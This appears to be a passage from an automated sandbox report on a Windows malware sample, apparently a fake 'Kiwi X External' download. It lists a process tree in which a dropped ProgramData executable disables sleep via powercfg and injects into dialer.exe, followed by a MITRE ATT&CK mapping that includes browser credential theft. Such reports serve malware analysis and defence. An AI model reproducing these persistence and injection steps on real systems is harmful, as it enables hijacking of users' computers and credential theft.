PID:1412

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4628

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:4024

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2508

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:4832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:3680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:2352

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
- Checks SCSI registry key(s)
PID:312

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1716
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Kiwi X External\Kiwi X External.dll
  2⤵
  PID:5252

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1276

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1872

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5340

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
PID:5764

C:\ProgramData\ndfjsdloamfk\gptwlkqtlame.exe
C:\ProgramData\ndfjsdloamfk\gptwlkqtlame.exe
1⤵
- Executes dropped EXE
PID:3452
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:5308
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:5884
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:5284
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:440
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:2840
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:5304

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4360
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 6028 -ip 6028
  2⤵
  PID:5244
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 580 -p 1980 -ip 1980
  2⤵
  PID:4568

C:\ProgramData\ndfjsdloamfk\gptwlkqtlame.exe
C:\ProgramData\ndfjsdloamfk\gptwlkqtlame.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5040
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:5376
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2688
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2288
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4692
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1172
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3704
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4188
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1020
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:2884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:5392

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
1⤵
PID:2616

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:6048

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Checks SCSI registry key(s)
PID:6104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc
1⤵
PID:1148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:3004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
1⤵
PID:916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs
1⤵
PID:1136

C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
1⤵
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:1436
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1436 -s 2980
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:5732

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
- Modifies registry class
PID:4468

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
1⤵
PID:3364

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:8
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6072 -ip 6072
  2⤵
  PID:3532

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4112

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:5588

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4276

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5124

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4392

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:1164

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery